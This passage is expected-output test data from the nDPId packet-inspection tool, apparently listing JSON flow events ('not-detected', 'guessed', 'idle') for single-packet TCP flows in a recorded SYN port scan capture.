{"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2525,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":837,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IPsec","breed":"Safe","category":"VPN"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1623,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":515,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 